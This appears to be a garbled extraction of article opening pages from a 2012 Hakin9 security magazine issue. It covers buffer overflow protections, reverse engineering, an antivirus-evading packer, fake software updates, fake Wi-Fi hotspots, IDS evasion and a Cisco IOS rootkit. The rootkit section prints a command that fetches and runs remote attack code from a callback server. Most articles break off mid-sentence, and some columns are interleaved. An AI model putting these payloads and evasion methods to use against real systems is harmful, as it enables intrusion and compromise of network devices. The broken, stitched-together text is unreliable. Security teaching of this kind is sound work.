are made available in a way that the reader can reproduce
our attack scenarios. Dont miss the next Hakin9 issue,
where we will analyze real vulnerabilities.
Theoretical Background
We start our journey with a small introduction on how

processes, memory and registers work.
A program becomes a process when it is loaded by a
loader in memory and executed. In this phase, a process
identifier, called PID (Process Identifier) is assigned to
the process. When the loader loads the executable file,
some special information that is contained in its header
is read. The executable file is in fact a COFF (Common
Object File Format). The COFF implementation is called
Portable Executable (PE) in Windows, and Executable
and Linking Format (ELF) on Linux systems. Two main
sections are defined:
the header permits to load in RAM memory the

executable file. It holds the information about the
.text, the .data and the .stack sections (and .bss)
the payload contains the code
Data: region where static variables are saved. It

corresponds to the COFFs data section.
Stack: region in which local variables, return values
and parameters of the function are saved. From the
perspective of this article, this is the area of interest.
A fourth area is the Heap, in which dynamical
variables used by the process are allocated.
In a system, any sort of operation is performed

using CPU registers that serve as store units. Intel
Architecture 32bit (IA32) defines four register families:
General Purpose Registers (GPRs)

Segment Registers: CS (Code Segment), DS (Data
Segment), ES (Extra Segment), FS, GS, SS (Stack
Segment)
Control Registers: EIP, CRX, ...
Other: EFLAGS, etc...
The GPRs registers are defined as: EAX, EBX, ECX,

EDX, ESI, EDI, EBP, ESP. The E letter was introduced
in the change from 16 to 32 bits. The EAX register is
shown in the Figure 1.
Two special registers are the Base Pointer (EBP) and
the Stack Pointer (ESP). They are commonly adopted
When the executable is loaded, the OS organizes the

allocated memory in three areas:
68
Text: read only area that contains the programs

code and other read only information. It
corresponds to the COFFs text section.
Figure 1. Structure of EAX register
01/2012
BUFFER OVERFLOW
Smashing
the Stack 2
Modern operating systems come with sophisticated protection
mechanisms to prevent one-click exploitations. But, how can
attackers bypass such techniques to compromise remote machines
all over the world? And downloading PDF documents is always a
safe practice?
elcome to this follow-up on our previous article

on the exploitation of software vulnerabilities,
which we published on Hakin9 ES #1 [0].
This article is made of two chapters: In the first one we
describe the different protection mechanisms that have
been introduced in modern operating system to make
exploitation more difficult. We then present several
popular workarounds used by attacker to bypass
such techniques. Finally, for the joy of our readers, we
analyze a real exploit for a Acrobat Readers stackbased buffer overflow (CVE-2010-2883).
Protection Mechanisms Against Buffer

Overflow
In this chapter we present the protection mechanisms

introduced in Windows 7 and the Visual Studio 2008
suite to enhance the security of their users by preventing
one-click easy exploitations.
At a first glimpse, we can divide these mechanisms in
three classes of categories:
Compiler-based: the /GS flag

Linker-based: the /SafeSEH flag, ASLR and DEP
Runtime checks
Buffer Security Check /GS
epilogue. Firstly a random value, called cookie or

canary, is stored on the stack, and a sort of variable
reordering is done.
Once the program is launched, the cookie is saved
in the .data section, then, if necessary, during the
procedure prologue is moved on the stack between
the local variables and the ret address (the value we
are going to protect). In a generic situation the stack
appears like in Figure 1.
Figure 2 shows how to enable/disable this flag on
Visual Studio 2008.
This is the new prologue using the /GS flag:
vuln!main:
00411260 55 push ebp
00411261 8bec mov ebp,esp
00411263 83ec4c sub esp,4Ch
00411266 a100604100 mov EAX,dword ptr [vuln!__security_

cookie (00416000)]
0041126b 33c5 xor EAX,ebp
0041126d 8945fc mov dword ptr [ebp-4], EAX
As someone can see, the value of the cookie is stored

in the EAX register, xored with the base pointer and
put on the stack.
We start by analyzing the /GS flag provided by the

Visual Studio C/C++ compiler. This option tries to
prevent stack-based buffer overflow at runtime by
adding specific code to the procedures prologue and
Figure 1. /GS stack situation
80
Figure 2. /GS on Visual Studio 2008
01/2012
BUFFER OVERFLOW
Exploit a Software
with Buffer Overflow Vulnerability and Bypassing Aslr
Protection
In this article you will find out what the Buffer overflow vulnerability is,
and how you can scan any software for this kind of vulnerability.
ou will also learn how to write your own

exploitation with python programming language
and bypassing ASLR protection and finally, how
to run your own shellcode to control Vulnerable OS.
What is Buffer overflow
Buffer overflow is an anomaly where a program while

writing data to a buffer overruns the buffers boundary
and overwrites adjacent memory. This is a special case
of violation of memory safety. For example: if you have a
2 liter bottle and you tried to fill it with 2.5 liters of water,
of course the water will overrun the bottle boundary and
0.5 liter will fall down.
Buffer overflow vulnerability is the most dangerous
vulnerability in the software world because it could allow
for an exploitation for OS which include this vulnerable
software.
You can have a look at Buffer overflow top threats, http://
www.isssource.com/attack-vector-buffer-overflows-topthreat/.
If we looked at buffer overflow in technical view:
A buffer overflow occurs when data written to a buffer,
due to insufficient bound checking corrupts data
values in memory addresses adjacent to the allocated
buffer.
For example
Here a program has defined two data items which are

adjacent in memory; an 8-byte long string buffer, A, and
a two-byte integer, B. Initially, A contains nothing but
zero bytes, and B contains the number 1979; characters
that are one-byte wide (Figure 1).
Now, the program attempts to store the nullterminated string excessive in the A buffer. By failing
to check the length of the string, it overwrites the value
of B (Figure 2).
Although the programmer did not intend to change B
at all, Bs value has now been replaced by a number
formed from part of the character string. In this example,
on a big-endian system that uses ASCII, e followed by
a zero byte would become the number 25856. If B was
the only other variable data item defined by the program,
writing an even longer string that went past the end of
B could cause an error such as a segmentation fault,
terminating the process.
And what about ASLR protection?
ASLR refers to address space layout randomization.

For example, if you have an instruction like Call ESP
from kernel32.dll and this instruction offset location
is in 0000001, after rebooting your PC this offset will
be changed to another number. This means we cant
Figure 1. Empty registers
Figure 2. registers after lling it
88
Figure 3. VUPlayer
01/2012
REVERSE ENGINEERING
Reversing EXE with

OllyDbg
This article is a basic introduction to Reverse Engineering. I have
chosen to illustrate the reverse engineering of a sample executable
file, and how to patch it. The article focuses primarily on a practical
example of reversing.
o what is reverse engineering (RE)? Wikipedia

says: Reverse engineering is the process of
discovering the technological principles of
a device, object, or system through analysis of its
structure, function, and operation. Normally, source
code is compiled to one or more object files which are
then linked to form an executable. The source code is
in human readable form, object files are binary files
with human-readable symbols. Executables are pure
binaries. When we attempt to revert a binary executable
into its object form, it is called disassembly. Converting
an object file into source code is called decompilation.
The whole process is called reverse engineering
(Figure 1).
Goals of RE:
The main goals of RE may include the following:
Figure 1. RE Process
98
A little Dive Into Assembly and Registers
Knowledge of assembly is required to perform a

successful RE of a program. Although study of
assembly and instruction sets is a separate topic in
Security/Vulnerability Research: The most common

aim of doing RE is the discovery of potential
flaws in the source code such as buffer overflows
or any weak business logics implemented, for
example client side validations, weak/homemade
encryptions schemes etc. These can be highlighted

and may ultimately determine how how secure or
insecure the software is.
Malware research: Understanding behavior and
property of malware is very necessary in order to
develop a mitigation plan ... how they behave, how
they propagate, what flaws they exploit, etc.
Writing drivers: Sometimes writing a driver for your
hardware requires reverse engineering in order to
gain a deep understanding of its operation
Patch Analysis: Before applying patches they can
be reverse engineered to take deep dive into their
inner functionalities.
Figure 2. Stack
01/2012
REVERSE ENGINEERING
A Quick Hands On
Introduction to Packing
On Windows systems, programs are usually available in the PE file

format with the .EXE extension. Although this file format is quite
complex, it is now well documented, so understanding how it is
globally supposed to work is pretty easy and you can find a lot of
programs designed to open/analyze/modify PE executables.
hose which are designed to modify PE files (for

various purposes) are often called packers. Well
learn how to write one of those in this article.
Well start by taking a glance at PE file formats basis;
then well design the principle of a small packer able to
modify our pentest tools in such a way that they are less
detected by AVs; and finally well implement it in Python
using both the good old pefile module and the brand
new miasm reverse-engineering framework.
miasm
The tools
Overview
pele
The pefile module is a multi-platform Python module

used to read and work with Portable Executable
(aka PE) files. It can be downloaded here: http://
code.google.com/p/pefile/. Well use this specialized
module throughout the article; it is very efficient when
dealing with PE files. The drawback of being specialized
is that some steps of writing our packer cant be done
with pefile alone.
miasm is a free and open source (GPLv2) reverse

engineering framework for python that can be
downloaded here: http://code.google.com/p/smiasm/.
Being a reverse-engineering framework, it is much more
versatile than pefile, but it is also much younger and still a
bit unstable. Despite its youth well see that it is sufficient
to build a complete tiny packer.
PE format
In their simplest form PE files can be represented as a
collection of sections and a bunch of metadata. Sections
are blobs that are mapped in memory when the program
starts. These blobs can contain anything useful to the
program: such as the program code itself, constant
values, icons, etc. The metadata (mostly located in
the PE file headers) contains a lot of information; at
the very least the metadata defines where the sections
are located in the file, what their name is, where they
are supposed to be mapped to in memory, and where
the starting point of the program is in memory, once the
sections are mapped.
Listing 1. peles basis
>>> import pefile #loading the pefile module
>>> pe = pefile.PE("calc.exe") #we open the wellknown calc.exe program
>>> for s in pe.sections:

...
...
print s.Name
.text
.data
Figure 1. Overview of a PE les structure
102
.rsrc
01/2012
REVERSE ENGINEERING
Hacking Applets:
A Reverse Engineering Approach
In this article well discuss a technique that can be used to modify
the applets Java byte code without having to recompile the applet.
This is useful when the source code of the applet is not recoverable
because it is obfuscated using tools such as DotFuscator.
ou are going to learn the reverse engineering

and patching of Java based applications. Well
use a common deployment scenario where:
reverse engineering applications; this array holds the

class byte code.
The applets are signed

The applets run in the context of Internet Explorer,
using proxy settings imported from the browser
settings.
This is a variable length structure, this is used to hold

the code of the methods defined in the class/interface,
max number of local variables, max stack size, and
an exception table which indicates the extent and
nesting of try blocks and corresponding catch blocks.
This also holds some other important attributes, called
LineNumberTable and LocalVariableTable, these attributes
hold information that is used by debuggers to locate
local variables and match the byte code with the
respective line number in the original source code.
A brief about Java class file format
The Figure 1 shows the basic layout of a Java class

file.
Now well take a look at some of the important
members, which will be useful as we move ahead:
Code Attribute:
Constant Pool
The Java virtual machine relies on symbolic

reference of classes to get the runtime
layout, the byte code refers to these symbolic
references, and these references are placed in
the constant pool.
Each constant pool entry has the following
format:
cp_info {
u1 tag;
u1 info[];
Fields Array
This gives the complete description of all the

fields in the class/interface.
Method Array
The method array is another important

structure that we need to be aware of before Figure 1. Java class le format
110
01/2012
EXPLOITING CLIENT SOFTWARE
Hijacking Software
Updates with Evilgrade
On a daily basis, software and applications are connecting to remote
servers looking for updates. Almost every modern application
comes with a simple, built-in update mechanism. Usually it is
sensible for users to accept updates that improve the security and
operation of the program.
y default, operating system and applications are

configured to automatically check for updates
for themselves, and notify users when they are
available. When prompted, one simply clicks OK and
the newest version will be downloaded and installed on
your computer.
This is very elegant feature but it encourages users to
accept updates without verifying the source, reading the
change log or license agreement. Doing so would be
tedious considering the plethora of security programs,
productivity suites, communications software and
multimedia applications we have on our computers.
Attacking users via update systems is not new.
Software developers do not spend much time or effort
on updates and secure delivery mechanisms. Thats
why standard processes for updating applications make
many users vulnerable The process is as follows:
Application by initiates update process

Application will connect to the DNS server host for
example update.app1.com
DNS server replies with server IP (for example
200.1.1.1).
Application downloads a special file with information
about the update, for example lastupdate.xml from
update.app1.com
Application analyzes the update file and detects
new updates
Finally App1 downloads and execute the update:
http://update.app1.com/update.exe
These are the standard steps used by most software

applications to install patches. You will notice that
there are few security measures like authentication
on the server level, checking the digital signature
of the update or other elementary operations for
116
securing the upgrade process. A lot of applications do

not verify the updates contents and blindly trust the
master update server. This does nothing to prevent an
attacker pretending to be the update server and submit
an application file to run on the system. This can be
achieved using the standard man in the middle attack,
DNS cache poisoning and Evilgrade, an advanced
utility for delivering fake updates that can contain
malicious content for a ready module.
Evilgrade is modular framework that allows attackers
to take advantage of poor update implementations by
injecting fake updates. It was developed in Perl and
includes ready-made modules. While the framework
is written in Perl, you can run it on any platform. I used
it on Backtrack 5. You can also install it on Windows
operating systems by adding Active Perl.
Evilgrade Module Development
Evilgrades most important functionality is the Module

framework that we can use for attacking software
updates. These modules are very simple to create. So
if you are looking to add a new module for attacking
new software, you can add a Perl module package
and integrate it in the module folder for later use. Here
is a module for Sun Java updates. You can change
the value according to your desired application: see
Listing 1.
Evilgrade on BackTrack 5:
First you need to download Evilgrade from the official

website (http://www.infobytesec.com/) If you have
difficulties in finding the software packages you can use
the Google code mirror (http://code.google.com/p/isrevilgrade/).
Next you need to extract the software and run it as
follows (Linux):
01/2012
Direct Object
Reference or,
How a Toddler Can Hack Your Web Application
There is no point in denying that everyday software is steadily moving
from desktop applications to Web applications. When you can check your
mail, play games, create documents and file your tax report without ever
leaving your browser, then you are indeed a citizen of the Web.
n this era, many miscreants have changed their

game. Its easier for them to impersonate you or steal
your private data from a vulnerable Web application
than to take control of the Extended Instruction Pointer
(EIP) register of your CPU. The reason is simple. As
a software industry, we have more experience writing
native applications in C and C++ than writing Web
applications in PHP and JavaScript. People still write
bugs in their code, but they are definitely harder to find
and exploit than it was 10 years ago.
In this article we will investigate one type of Web
application vulnerability, namely Direct Object
Reference. A Direct Object Reference occurs when
an identifier, used in the internal implementation of
a Web application, is exposed to users. When this is
done insecurely, it can lead to a lot of trouble. This
vulnerability is probably one of the easiest to exploit but
is so deadly and prevalent that it claims the 4th position
in OWASPs Top 10 Web Application security risks [2].
Many institutions have fallen victim to it, with the most
recent example of an Australian financial company
which was vulnerable in a way that made it possible
for anyone to access other peoples private financial
information [1].
Vulnerable Web Application
In order to make explaining easier, we will use as an

example a dummy Web application that allows loggedin users to send personal messages to each other. All
the messages exchanged between members are stored
in a specific table in an SQL database as follows: see
Table 1.
The message_id column contains auto-incremented
values, unique for every message. The columns to
and from contain the user identifiers of the sender
and recipient of any given message. The title column
122
contains the title of each message and lastly the

message column contains the actual message
exchanged between two users. Now lets look at some
of the PHP functions used by the Web application to
display a users Inbox and allow him to read incoming
messages (Listing 1).
Viewing the INBOX
The function get_message_titles() is responsible for

providing logged-in users an overview of their Inboxes.
The first thing that the function does is to check whether
the user is logged-in. It does this by checking whether
the superglobal $_SESSION array contains a key titled
user_id. This key is set by the Web application when
the user successfully logs in, and is typically a unique
identifier in the Users table of the application much like
the unique identifier of each message in the Messages
table. We will not need that function in our discussion
thus for the sake of brevity, it is not shown in Listing 1.
If that key is not set, then the code redirects the user to
the login page of the Web application and returns.
If the user is indeed logged-in then the users
user_id is extracted from his session. Note that the
Figure 1. Table messages containing personal messages that
users exchanged with each other
Message_id From To
Title
Message
...
...
...
...
...
776
23
11
Hey!
Hey man!<br>
What news?</br>
777
11
25
Foo...
U there?
778
25
42
No Title
Kthnxbye!
779
23
11
Welcome Welcome to our

site!...
...
...
...
...
01/2012
How to
Recover Passwords from a Memory Dump
Were you ever curious about what could be done with a memory
dump of an active computer? This article is a short demonstration
on how to acquire a memory dump from a running system, and then
how to use tools to not only recover the system password hashes
from the memory dump, but also how to decode them.
alware analysis is an amazing field. To be able

to grab a memory dump from a live machine
and then have the capabilities to pull useful
information from it just amazes me.
Malware analysis tools are used by several
different types of professionals for different purposes.
Professional and volunteer malware analysis experts
use these programs to dissect memory and learn
about the latest malware infections. Law enforcement
personnel use memory dumps and analysis programs
in criminal investigations to gather evidence for court
cases. Even penetration testers use these tools to
gather information about the systems and target
network that they are auditing.
The evolution of securing a machine with increasingly
complicated system passwords is also very interesting.
I have been in the IT field for two decades. And over the
years I have seen the IT field move from the ideals that
any password will do, to insisting that only long alpha
numeric strings including upper and lower case letters
and symbols will suffice.
You can do some pretty interesting things with
memory dumps. If you want to see exactly what was
running on a system, you can do that. If you want to
see what network connections were active and to what
outside networks the system was attached too, you
can do that too. Malware analysis programs will even
go through a memory dump and find questionable
artifacts, hidden and injected code installed by
malicious software.
But what other items of interest are lurking in the
depths of system memory? Can we find pertinent
system settings, and even pull information from
them?
The answer is yes! A copy of registry information is
stored in system memory, and we can locate it with
128
malware analysis tools and pull key data from it. But
that is not all; a copy of the Windows passwords is kept
in memory. And not just for the current logged in user,
but a collection of the passwords for ALL of the systems
users.
The passwords are not stored in plain text in memory.
They are stored as password hashes. Hashes are an
encrypted form of the passwords and they are in a
format that looks like this:
aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59
d7e0c089c0
The password hash actually contains two separate

hashes of the same password. The hash to the left
of the colon is the LM Hash, or Lan Manager hash.
A very simple encoding of the password that is
compatible with old versions of Windows. The numbers
to the right of the colon are a more complex encoding
of the password called the NTLM hash.
The LM Hash is a very antiquated password hash
that was used in pre-Windows NT systems. Basically
how it works is that the password is padded to fourteen
characters in length if is not already that long. The
password is then converted to all uppercase letters
and it is divided into two seven byte sections. The two
halves are then used to DES encrypt a constant string.
This results in two values that are combined to create
the LM Hash. This hash has been cracked a long time
ago, but it is still computed and stored in Microsofts
current operating systems.
NTLM, another old hashing technique, is a bit better. If
you have a fourteen character password, it would allow
all fourteen characters to store the hash. The password
is not broken into two halves. It also allows upper and
lower case letters, instead of converting them all to
01/2012
www.webauthority.eu
Co-funding support provided by European Union from European Regional Development Fund
Creating a
Fake Wi-Fi Hotspot to Capture Connected Users
Information
We can use a standard laptop to create a fake open wireless access
point that allows us to capture a large amount of information about
connected users; in certain environments, such as airports or meeting
areas, this kind of operation can represent an enormous security threat
but, on the other hand, the same approach is a powerful way to check
the wireless activity in certain areas where the security is very important.
very day an enormous number of users try

to connect their devices (laptops, tablets,
smartphones, etc.) to one or more Wi-Fi wireless
Hotspots in order to use internet: many of these people
connect to wireless networks without considering
whether the Hotspot used is fake or built ad hoc mode
to conduct illegal or fraudulent operations (capturing
personal data, fraud, identity theft, etc.).
With a little effort, anyone can create a fake Wi-Fi
Hotspot and use it to gather precious information about
connected users, information such as usernames,
passwords, messages and so on.
Using a standard computer (Figure 1) and some
open-source software, an attacker can set up bogus
Wi-Fi gateways where many laptops, smartphones and
other latest generation mobile devices will automatically
connect: and once a connection is established, all data
passing through the Wi-Fi gateway can be read directly
(not encrypted data) or after a short/long processing
period(encrypted data).
A collateral aspect associated with this kind of risk
is the possibility for an attacker to simulate a standard
Wi-Fi Hotspot where users have to pay to obtain the
internet access: in this case users are invited to pay
through their credit card; when the attacker has this
information the consequences should be crystal clear.
The weakest element of the Wi-Fi Hotspot system
is the absence of a strong identification mechanism,
because the only form of identification used is a name,
typically the Hotspot name. For this reason it is very
simple to create a bogus Hotspot and deceive a large
number of users.
It is a worthy goal to create a system able to
solve or reduce this kind of problem: a trustworthy
authentication service based on a detailed identification
134
between devices and Hotspots. However, the main

problem remains, because there is not a way for users
to distinguish fake hotspots.
Everywhere
An attacker can use his properly congured laptop in a large

number of public places, even in an airplane, simulating the
Wi-Fi gateway used by airline and capturing personal data
of connected passengers.
Build up the system
In order to build our system we only need a standard

laptop with two network adapters: two wireless adapters
Figure 1. Fake Wi-Fi Hotspot operating scheme
01/2012
Deceiving Networks
Defenses
with Nmap Camouflaged Scanning
An attacker could deceive an IDS/IPS system through a particular
feature offered by Nmap software, a simple option able to trick the
rules generally used in this kind of systems to detect any suspect
activity inside a medium/large network; the used software is the
most famous network scanner in the world and the knowledge of its
potentiality is a good way to improve our security policies.
142
oday we can find a very large number of

tools devoted to the exploration of the remote
networks but in spite of this, the sector operators
(network and system administrators, attackers, etc.) all
converge toward a specific software: Nmap, a powerful
tool universally considered the better of this category.
At the same time we can observe that nearly all
medium/large sized networks use systems such as the
IDS (Intrusion Detection System) and the IPS (Intrusion
Prevention System) in order to detect and alert this kind
of activity.
In a short, an IDS system works in passive mode,
watching the network traffic and comparing its packets
with a certain number of configured rules and activating
an alarm when it detects something suspicious: in
Figure 1 we can see a typical IDS system placement

inside a network.
An IDS is able to detect several types of malicious
traffic, a traffic that is usually not blocked by a firewall
system (attacks against host services, unauthorized
login attempts, viruses, etc.).
It uses various methods to detect threats and these
methods are mainly based on the stateful protocol
analysis and signatures/anomalies detection.
An IPS system operates as a IDS, but differently from
this one, it can also block malicious traffic and just for
this reason it is placed in-line between the external and
the internal networks exposed to attacks.
The IPS can block the attacks by terminating the
network connection, blocking the user who is making
Figure 1. A typical IDS system placement
Figure 2. A typical IDS system placement
01/2012
Overriding Function
Calls in Linux
Function hooking and overriding plays a vital role in penetration test of thick
client application. In this article we will discuss how shared libraries in Linux
environment can be overridden with out recompiling the code. By overriding
the function calls we can sniff the communication protocol, modify the
communication parameters and fuzz the communication protocol.
en-testing a thick client Linux application involves

reverse engineering. Reverse engineering is
multi step process in which assessor has to
inject malicious code, decompile, disassemble, and
debug the application to understand the internals of
application.
Now-a-days applications are more complex and utilize
shared libraries for code reusability. If an assessor can
sniff the communication between different modules
of an application, it will provide him insight details
of how these modules communicate. By leveraging
this knowledge an assessor can eventually fuzz the
communication protocol to uncover vulnerabilities.
Shared library calls can be overridden/hooked easily by
using function interposition technique.
Background
In Linux system generally there are two types of

libraries. Static libraries (.a) file and Dynamic libraries
(.so) file. When a program is compiled with dynamic
libraries, list of un-resolved symbols and list of libraries
that program is linked-to are included in the binary file.
Upon execution the un-resolved symbols are resolved

at run-time by linked libraries. The linked library that
responds first will receive the call.
In above illustration the binary file has an un-resolved
symbol for function foo. Lib A has the implementation
of function foo and if libA responds first at run-time to
resolve this symbol, it will receive the call.
Hacking WGET
Lets consider an example application wget. Wget is

a console-based web downloader, which can interact
with HTTPS in addition to HTTP web sites. For SSL/
HTTPS communication wget relies on OpenSSL library.
OpenSSL is open source implementation of SSL/TLS
and allow applications to interact easily with SSL/TLS
based web sites.
We can download https web sites using wget as
shown Listing 1.
By executing the above command the output should
be as follows: Figure 2.
You can see from Figure 2 that wget is able to
download index.html from https://mail.yahoo.com. Lets
assume that we want to figure out the http request
headers generated by wget. The first step to achieve
this task would be to figure out the shared libraries used
by wget. We can use ldd utlility as follows: Figure 3.
By using ldd we can observe that wget is using
libssl.so.0.9.8, which is OpenSSL library to communicate
over HTTPS channel.
Listing 1. Wget command
wget https://mail.yahoo.com --no-check-certificate
Figure 1. Illustration of symbols resolution at run-time
150
01/2012
Cracking Java
applications using AOP exploits (part 1)
In this series of articles we will outline an idea on how to gain access

into protected Java desktop applications (J2SE) exploiting properties
of Java platform that enable Aspect Oriented Programming (AOP),
like weaving code into existing classes.
e will learn the basics of AOP and a simple,

yet powerful idea behind the exploit. We
will also learn how to harden your Java
applications against such simple but powerful attacks.
The author assumes intermediate knowledge of Java
and the paradigms underlining Java technology stack.
Introduction
Aspect Oriented Programming is a paradigm that aims

to modularise software further by the separation of
crosscutting concerns. You will find much better definition
and explanation within literature (Jacobson, I., Pan-Wey,
Ng, (2004) Aspect-Oriented Software Development with
Use Cases, 1st Edition, Addison Wesley.) or among online resources (Wikipedia, Aspect-oriented programming,
Available: http://en.wikipedia.org/wiki/Aspect-oriented_
programming [18 Sept 2011]), however we would like to
focus on practical implications of AOP.
Let us see, what those crosscutting concerns of
software are. Imagine that your codebase takes
advantage of Object Oriented Programming paradigms
like modularity, encapsulation, and data abstraction.
Now in our imaginary scenario, new requirement
comes into light. We need to measure the execution time
of each method, in order to find the bottlenecks within
the system. Sounds like a programmers nightmare.
The worst-case scenario (and the worst solution) would
be to alter every method of every class by adding logic
to measure the execution time. It would cause code
entanglement and would compromise modularity and
encapsulation.
By the instrumentation of our code with the time
measuring aspect, we can achieve our goal without
manually changing every method of every class. We
simply use AOP to apply the same time measuring
advice by wrapping it around each method. The
156
following aspect definition traps calls to every method

of every class (*.*) and measures their execution time.
aspect TimeAspect {
define Number t;
define Pointcut *.* p(..);
before: p { t = getSystemTime(); }
after: p { output(Method: + thispointcut + finished

}
in +
(getSystemTime() t) ); }
The above pseudo-code has few keywords highlighted

in green that will give us dictionary used henceforth:
Pointcut: is where the aspect is applied. In this

case it is every method of every class indicated by
wildcards (*.*) having any number of parameters of
any type indicated by two dots (..)
before, after, around (types of advice): determines
whether the advice will be applied as the name
suggests: before, after or around each call to a
method that matches pointcuts criteria.
Figure 1. Crosscutting concerns in software
01/2012
Cracking Java
Applications using AOP (part 2)
In the first part, we have introduced the concept of Aspect Oriented

Programming. Through very simple practical example, we have
shown the capability of AOP, its tools and techniques, which could
be used to reverse engineer or even to modify the behavior of a
code.
n the second part of the series, we will present

the reader with a bit more advanced use of AOP,
which will allow us to reverse engineer obfuscated
Java applications. On top of that we will show a trick of
password post selection, which we use to find parts of
the code crucial to password processing, which in turn
will allow us to switch the whole password verification
off.
Introduction
AOP has been used in the domain of Software Security

before. Its use was mainly for validation, auditing and
authorization purposes, which in turn improve software
security as a whole. Those crosscutting concerns are
being woven into the existing software after the fully
functional code has been delivered. Making the process
two staged, allows separating the responsibilities.
Programmers implement the business logic, while
security professionals implement antidotes to known
software vulnerabilities. AOP involvement in improving
of software security goes further, as it also facilitates
clear definition of security concerns as one-time
security policy implementations, rather than security
code scattered and tangled across the whole of
the codebase. Making the actual implementation of
security smaller, means that it is understood better, it
is more transparent and less open for implementation
errors.
We have not found many resources, where AOP
was used to reverse engineer or to compromise
applications. We have certainly not seen the method
of security key post-selection, which we present in this
article, which guides to find the data path in the software
that the crucial security information, like license key or
password, takes. This fact alone does not mean that
such work has not been done before, so if the reader
160
knows of any similar work, the author would be grateful

for contacting him about it. Also if you could see a way to
improve the presented method or any of the techniques,
the author would also appreciate any pointers in the
direction of improvement.
In the first part of the series (http://hakin9.org/
exploiting-software-12011/), we have introduced the
basic concepts and notions used in AOP. We have also
guided the reader through an example that solidified all
the theory presented there.
In the second part we will continue with the theme
of reverse engineering and modifying software as a
post-production process. The post-production software
modification aspect is very important from a security
point of view. The ability to find the details of inner
workings of an application is a very powerful tool for
many Software Security professionals. The ability to
dynamically modify the behavior of the code (postproduction) is even more powerful tool still. And postproduction in reality means: without an access to the
source code.
Whether through your work or hobby, you wear black
or white hat, we hope you will find the article informative
and educational.
Although the author is a Java programmer by trade,
you dont have to be one in order to successfully follow
the methods, techniques and findings. Please keep in
mind that AOP as a technology is implemented in most
modern programming languages and transplanting our
findings to your favorite technology stack should be a
matter of mere syntax. It is also authors intention to
improve the security and art of secure software delivery
through educating, rather than to cause mayhem
among software industry.
As in part 1, we will use Eclipse + AspectJ
Development Tool.
01/2012
Cisco IOS
rootkits and malware: A practical guide
Cisco IOS is the predominant OS for networking devices on the

internet. Cisco IOS has evolved an advanced feature set in the CLI
and flexible scripting abilities that provide the network administrator
with onboard real-time network event detection, automated network
recovery functions, and other valuable capabilities.
hese features, however, may also be used

to exploit critical network devices, network
traffic traversing these devices and act as a
launch point for further attacks into a network. This
presentation discusses the use of and demonstrates an
IOS Embedded Event Manager rootkit and worm. When
a router is infected it can be leveraged into a powerful
malware platform. Capabilities demonstrated will be
network packet captures, reverse shell connections,
a spam module, and a mini malware httpd server
leveraged with ip address hijacking. A self replicating
IOS worm with stealth features and self defense
mechanisms are also demonstrated, all with platform
independent code.
Cisco IOS currently has few rootkits and worms.
Previous rootkits use binary patching of the firmware to
insert a trampoline for rootkit code (1). This technique
has a limitation in that the firmware must be manually
patched. Furthermore, the patching requires distinct
changes for different versions of firmware and cpu
architectures.
Cisco IOS has a powerful scripting and event
management toolkit Embedded Event Manager (EEM)
which has a number of incarnations. The rootkit and
worm are written in EEM TCLSH and are accompanied
by non-EEM tclsh modules and supporting files.
Cisco IOS has a few variations of tclsh in current
versions of IOS. The first and easiest variant is the cli
tclsh interpreter. To get into the interpreter from enable
mode, simply enter router#tclsh and your prompt will
change, dropping you into the tclsh interpreter. At this
point you can type a combination of tclsh and IOS
commands that will execute in real-time. Commands
that require a brace/bracket closing will of course wait
until the closing brace. This command mode is a good
166
way to test out code fragments and to proof of concept

small subroutines. An example would be to ping multiple
hosts, Listing 1.
The notable feature here is that if you type a command
that is not a tclsh keyword or a defined procedure, the
command is assumed to be a Cisco IOS command to
be executed from the privilege level of the user.
A feature of the tclsh cli command is the file execute
mode. In this mode you have the ability to specify a file
to execute with the tclsh interpreter. There is support
for direct manipulation of the configuration with the
ios_config command. With the ios_config command
in a tclsh script you can easily make configuration
changes without having to go into a configuration
mode. While the file could be located on the flash/disk,
the interpreter does understand a remote execution.
Remote execution is most helpful in that it forms the
basis for the initial payload drop into the router and the
remote code execution from the callback server. Here is
a brief example in Listing 2.
This command will execute tclsh code from the
remote file rootme which is located on the web-server
on 192.168.1.100. The code for rootme is contained in
Listing 3.
Listing 1. Tclsh cli ping
router1# tclsh
tclsh% foreach x {12 22 23} {

ping 192.168.1.$x }
Listing 2. Tclsh remote execution

router1# tclsh http://192.168.1.100/rootme
01/2012
DEFENSE
Easy Network
Security Monitoring with Security Onion
Intrusion Detection Systems monitor and analyze your network traffic
for malicious threats. The problem is that they can be very difficult to
configure and time consuming to install. Some take hours, days or even
weeks to setup properly. The Security Onion IDS and Network Security
Monitoring system changes all of that. Do you have 10 minutes? That is
about how long it takes to setup and configure Security Onion.
ackers and the malware that they create are Snort, Suricata, Sguil, Squert, Snorby, Xplico, Argus,
getting much better at evading anti-virus Bro, Wireshark, and many others.
programs and firewalls. So how do you detect
Sounds complicated right?
or even defend against these advanced threats?
Well, Doug has done all the hard work in integrating
Intrusion Detection Systems (IDS) were created to these systems together into a very user friendly
help detect the malicious activity that our networks are environment (see Figure 1).
facing. The only problem is, they tend to throw a lot of
Run Security Onion on a system that has two network
false positive alerts and can get very overwhelming to cards and you have a complete NSM/IDS system. One
monitor.
NIC connects to your network or the internet side of
Enter Network Security Monitoring (NSM). In your traffic and records and monitors every packet that
basic terms, NSM software examines the alerts comes in or goes out of your system. The second NIC
from IDS systems, events and full packet data, and connects to your LAN and is used for management and
then prioritizes these threats and present them in a system updates.
graphical interface to be reviewed by an analyst. The
analyst can then choose whether the
alert needs to be acted on or if it can
be dismissed.
There are several commercial
products out there that do this, but the
free products from the open source
community are very feature rich and
capable. If you want a robust, cost
effective and easy to use Intrusion
Detection System (IDS) and Network
Security Monitoring (NSM) platform,
look no further than Doug Burks
Security Onion (http://securityonion.b
logspot.com/).
Security Onion is one of my favorite
security tools. Doug Burks did an
amazing job pulling together many
of the top open source IDS and NSM
programs into a user friendly Linux
distribution. Its based on Ubuntu and
contains a ton of utilities including Figure 1. Security Onion Desktop
180
01/2012
SeagateDataRecovery.com
Bad things can

happen to your laptop.
They dont have to
happen to your data.
Seagate Data Recovery Services work on any disk drive.
With our No DataNo Recovery Charge Guarantee, our skilled professional data
recovery technicians use cutting-edge technology to retrieve your data. And for
your peace of mind, we also recover data from server applications and virtual
technologies. Learn more at www.seagatedatarecovery.com.
2012 Seagate Technology LLC. All rights reserved. Seagate, Seagate Technology and the Wave logo are registered trademarks of Seagate Technology LLC
DEFENSE
Inspecting Https
Traffic On Gateways
In the past, security devices inspecting application content for
attack patterns, misuse or malware, had been blind to encrypted
traffic and because of this, encrypted protocols such as Hypertext
